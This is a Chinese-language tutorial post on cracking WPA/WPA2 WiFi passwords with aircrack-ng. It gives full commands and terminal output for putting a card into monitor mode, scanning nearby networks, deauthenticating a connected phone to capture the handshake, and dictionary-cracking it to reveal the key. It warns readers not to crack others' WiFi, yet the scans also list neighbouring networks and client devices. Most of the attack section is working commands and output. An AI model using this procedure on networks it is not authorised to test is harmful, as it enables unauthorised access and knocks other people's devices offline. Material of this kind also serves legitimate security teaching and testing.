无线WiFi破解(无线WiFi破解)

WiFi在我们生活中扮演不可或缺的角色,对于WiFi安全也是人们关注的热点之一,现在教大家利用软件进行WiFi破解渗透,注意WiFi破解技术只用于技术交流,生活中破解他人WiFi属于侵权行为,我来为大家科普一下关于无线WiFi破解?下面希望有你要的答案,我们一起来看看吧!

无线WiFi破解(无线WiFi破解)

无线WiFi破解

WiFi在我们生活中扮演不可或缺的角色,对于WiFi安全也是人们关注的热点之一,现在教大家利用软件进行WiFi破解渗透,注意WiFi破解技术只用于技术交流,生活中破解他人WiFi属于侵权行为。

1.准备工作

我们需要一台电脑,一块无线网卡,一个kail系统,如果你是Windows系统,你可以将

kail系统安装在虚拟机里,然后kail虚拟机导入你的无线网卡就可以完成前期准备,小米

WiFi,360WiFi都可以变为无线网卡使用,如果你的Linux系统就可以直接使用了,我使

用的是archLinux的发行版manjaro,我们使用的软件是aircrack-ng 这一款WiFi破解软件,它

主要破解的是wpa/wpa2的WiFi,对于wpe的WiFi现在已经绝迹,这里就不说了。

1.查看自己的无线网卡

airmon-ng

[makai@manjaro ~]$ sudo airmon-ng //sudo为提为root权限,root用户无需加

PHY Interface Driver Chipset

phy0 wlp3s0 rtl8192ce Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01)

上面的命令是列出支持监控模式的无线网卡,wlp3s0即为我们的网卡,如果没有任何输出,表示无线网卡不支持监控模式。你可以看到我的wlan0支持监控模式 。

2.开启无线网卡的监控模式

airmon-ng start wlp3s0

[makai@manjaro ~]$ sudo airmon-ng start wlp3s0

Found 4 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to run 'airmon-ng check kill'

PID Name

470 avahi-daemon

472 NetworkManager

484 avahi-daemon

523 wpa_supplicant

PHY Interface Driver Chipset

phy0 wlp3s0 rtl8192ce Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01)

(mac80211 monitor mode vif enabled for [phy0]wlp3s0 on [phy0]wlp3s0mon)//开启监控后,系统自动将wlp3s0转为了wlp3s0mon

(mac80211 station mode vif disabled for [phy0]wlp3s0)

3.查看当前WiFi网络

airodump-ng wlp3s0mon

[CH 9 ][ Elapsed: 24 s ][ 2016-11-02 16:22 ]

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:87:46:20:08:1F -46 57 49 2 6 54e. WPA2 CCMP PSK 360

00:36:76:11:61:A7 -53 50 999 49 1 54e. WPA2 CCMP PSK mima1-8

F0:B4:29:3B:E0:65 -47 47 628 0 1 54e. WPA2 CCMP PSK redian

8C:F2:28:26:CE:AA -44 38 26 0 13 54e WPA2 CCMP PSK MERCURY_CEAA //这是我们的实验路由器

B0:D5:9D:6D:2E:F8 -53 58 338 65 11 54e. WPA2 CCMP PSK 360免费WiFi-F8

B0:D5:9D:80:C0:B0 -47 47 1 0 6 54e. WPA2 CCMP PSK 360免费WiFi-B0

D4:83:04:F9:27:3A -56 50 12 0 11 54e. WPA2 CCMP PSK FAST

30:FC:68:23:44:C4 -64 28 9 0 1 54e. WPA2 CCMP PSK CMCC-02

BSSID STATION PWR Rate Lost Frames Probe

(not associated) B6:F6:EA:9D:63:F4 -21 0 - 1 4 4

(not associated) 20:82:C0:10:FA:D9 -77 0 - 1 0 3 XiaoFangJia

(not associated) AC:36:13:79:54:2C -81 0 - 1 0 1

00:87:46:20:08:1F CC:3A:61:C9:15:77 -37 0 - 1 0 5

00:87:46:20:08:1F A4:44:D1:32:25:27 -33 0 - 1 21 49

00:87:46:20:08:1F C0:EE:FB:06:2B:9A -47 0 - 1e 0 48

00:36:76:11:61:A7 9C:2A:70:C9:C3:53 -35 1e- 1e 1173 907

00:36:76:11:61:A7 74:E5:0B:A3:C6:B2 -46 1e- 1e 296 90

00:36:76:11:61:A7 90:C1:15:F1:86:C9 -55 0 - 1 12 4

00:36:76:11:61:A7 C4:43:8F:F2:88:96 -71 1e- 1 0 13

F0:B4:29:3B:E0:65 60:F1:89:60:6D:CA -34 1e- 1e 0 627

8C:F2:28:26:CE:AA 68:3E:34:3C:47:C0 -47 1e- 1 0 54

B0:D5:9D:6D:2E:F8 38:BC:1A:EC:34:62 -55 1e- 1e 44 340

D4:83:04:F9:27:3A 38:BC:1A:23:B1:51 -67 0 - 1 100 7

D4:83:04:F9:27:3A D0:7A:B5:57:60:21 -69 0 - 1 0 1

上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等,要记住要破解wifi的频道号(CH)和BSSID。

ctrl c结束进程,ctrl s暂停,ctrl q继续,可以利用这三个快捷键进行操作,当前我们可以ctrl c停止。

4.抓取握手包

airodump-ng -c 13 -w test wlp3s0mon

-c为CH即为信道,-w 为保存的位置,-w test为将数据包保存在test文件里

CH 13 ][ Elapsed: 24 s ][ 2016-11-02 16:44 ][ fixed channel wlp3s0mon: 4

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

F0:B4:29:3B:E0:65 -46 1 30 522 0 1 54e. WPA2 CCMP PSK redian

B0:D5:9D:80:C0:B0 -47 0 18 0 0 6 54e. WPA2 CCMP PSK 360免费WiFi-B0

8C:F2:28:26:CE:AA -49 43 95 22 0 13 54e WPA2 CCMP PSK MERCURY_CEAA //我们的路由器mac

00:36:76:11:61:A7 -47 0 25 117 1 1 54e. WPA2 CCMP PSK mima1-8

00:87:46:20:08:1F -53 5 26 26 0 6 54e. WPA2 CCMP PSK 360

D4:83:04:F9:27:3A -57 0 115 32 0 11 54e. WPA2 CCMP PSK FAST

30:FC:68:23:44:C4 -58 0 28 6 1 1 54e. WPA2 CCMP PSK CMCC-02

B0:D5:9D:6D:2E:F8 -63 9 112 112 12 11 54e. WPA2 CCMP PSK 360免费WiFi-F8

BSSID STATION(手机mac) PWR Rate Lost Frames Probe

(not associated) 00:19:86:31:94:24 -47 0 - 1 0 2

(not associated) A4:17:31:4F:0C:5F -47 0 - 1 15 6

(not associated) 8A:84:7C:92:A9:53 -51 0 - 1 2 3

(not associated) 68:3E:34:3C:91:58 -55 0 - 1 13 7

(not associated) AC:B5:7D:20:46:D1 -59 0 - 1 0 18 CMCC-01

F0:B4:29:3B:E0:65 60:F1:89:60:6D:CA -37 1e- 1e 0 522

8C:F2:28:26:CE:AA 68:3E:34:3C:47:C0 -17 1e- 1 0 27 //路由器链接的手机mac

00:36:76:11:61:A7 9C:2A:70:C9:C3:53 -34 1e- 1e 3 114

00:36:76:11:61:A7 24:0A:64:9C:E9:91 -47 0 - 1e 0 4

00:36:76:11:61:A7 90:C1:15:F1:86:C9 -54 0 - 1e 0 3

00:36:76:11:61:A7 C4:43:8F:F2:88:96 -77 0 - 1 0 1

00:87:46:20:08:1F A4:44:D1:32:25:27 -47 0 - 1e 0 56

D4:83:04:F9:27:3A 38:BC:1A:23:B1:51 -69 0 - 1 961 52

D4:83:04:F9:27:3A 08:57:00:C4:42:3A -65 0 - 1e 0 5 FAST

30:FC:68:23:44:C4 20:2D:07:CE:8C:CE -79 0 - 1e 228 12

30:FC:68:23:44:C4 70:EC:E4:BF:C2:9F -64 0 - 1 0 1

5.强制使连接到wifi的设备重新连接路由器

aireplay-ng -0 1 -a 8C:F2:28:26:CE:AA -c 68:3E:34:3C:47:C0 wlp3s0mon

-0指定发送反认证包的个数 -a指定无线路由器BSSID -c指定强制断开的设备

[makai@manjaro ~]$ sudo aireplay-ng -0 1 -a 8C:F2:28:26:CE:AA -c 68:3E:34:3C:47:C0 wlp3s0mon

16:52:46 Waiting for beacon frame (BSSID: 8C:F2:28:26:CE:AA) on channel 13

16:52:47 Sending 64 directed DeAuth. STMAC: [68:3E:34:3C:47:C0] [ 8|57 ACKs]

CH 13 ][ Elapsed: 55 mins ][ 2016-11-02 18:26 ][ WPA handshake: 8C:F2:28:26:CE:AA //我们可以看到这里变成了handshake,就是抓完包了。

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

掉线是为了让上网设备断网重新连接WiFi,这样我们就可以抓取它连接路由器时候的握手包了。

6.破解WiFi

aircrack-ng -w 1.txt test-01.cap

1.txt为你的密码字典 test-01.cap就是之前截取的包

[makai@manjaro ~]$ sudo aircrack-ng -w 1.txt test-01.cap

Opening test-01.cap

Read 714 packets.

# BSSID ESSID Encryption

1 8C:F2:28:26:CE:AA MERCURY_CEAA WPA (1 handshake)

2 B0:D5:9D:6D:2E:F8 360免费WiFi-F8 WPA (0 handshake)

3 D4:83:04:F9:27:3A FAST WPA (0 handshake)

Index number of target network ? 1 //选择1就是破解我们的目标路由器

Aircrack-ng 1.2 rc4

[00:00:15] 16084/19326 keys tested (1106.08 k/s)

Time left: 2 seconds 83.22%

KEY FOUND! [ 19940515 ] //我们目标路由器的密码

Master Key : 69 F5 C8 9C 45 26 03 23 08 FE 27 03 D8 83 6C 0A

4B 26 E1 AE 07 99 B6 11 51 1A 0F 25 AD 22 E9 5A

Transient Key : DC A9 11 93 44 A9 6A 8E 9D 79 4C 80 4F 61 3D 8C

B8 C0 5C 00 B0 D0 E8 99 E7 C6 C6 FB 6D D4 D3 35

94 0A A3 3B 17 00 08 F7 BA F0 4D 5E 9E B7 2C 3F

22 89 70 A6 36 1E 63 D2 64 8E 52 79 FD 41 57 70

EAPOL HMAC : FD 4E CB 71 B6 9C BB E6 A2 62 6F 92 A5 54 F8 85

7.关闭网卡监听模式

airmon-ng stop wlp3s0

这就是WiFi破解的全过程,当然我们还有其他的破解方法,比如ping破解法,但是总的来说

使用aircrack-ng来破解WiFi是主流,同时破解字典也是十分重要的,最后再次说明,WiFi破解只能

拿来技术交流,不要轻易破解他人WiFi。

来自墨守君

,

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页